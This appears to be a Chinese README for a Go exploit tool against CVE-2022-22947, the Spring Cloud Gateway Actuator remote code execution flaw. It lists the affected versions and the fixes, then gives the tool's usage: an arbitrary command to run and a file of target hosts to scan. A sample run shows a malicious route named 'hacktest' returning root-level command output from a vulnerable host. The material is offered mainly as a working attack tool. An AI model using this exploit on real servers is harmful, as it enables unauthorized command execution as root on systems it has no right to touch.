Spring Cloud GateWay是Spring Cloud的⼀个全新项⽬，⽬标是取代Netflix Zuul，它基于Spring5.0+SpringBoot2.0+WebFlux（基于⾼性能的Reactor模式响应式通信框架Netty，异步⾮阻塞模型）等技术开发，性能⾼于Zuul，官⽅测试，GateWay是Zuul的1.6倍，旨在为微服务架构提供⼀种简单有效的统⼀的API路由管理⽅式。 Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）发生在Spring Cloud Gateway应用程序的Actuator端点，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求。 该漏洞CVSS评分：9.8，危害等级：严重

CVE-2022-22947

3.1.0 3.0.0至3.0.6 3.0.0之前的版本

3.1.x用户应升级到3.1.1+ 3.0.x用户应升级到3.0.7+ 如果不需要Actuator端点，可以通过management.endpoint.gateway.enable：false配置将其禁用 如果需要Actuator端点，则应使用Spring Security对其进行保护

该脚本通过golang完成并且编译windows运行脚本

-cmd string 执行命令 (default "id") -host string 待检测地址或者存放文件路径 (default "http://127.0.0.1:80")

如： ./cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"

>cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"

result:  http://127.0.0.1:10089  :  {"predicate":"RouteDefinitionRouteLocator$$Lambda$978/705851885","route_id":"hacktest","filters":["[[AddResponseHeader Result = 'uid=0(root) gid=0(root) groups=0(root)\n'], order = 1]"],"uri": "http://example.com:80","order":0}
vulnerable host:
http://127.0.0.1:10089

https://nosec.org/home/detail/4971.html https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947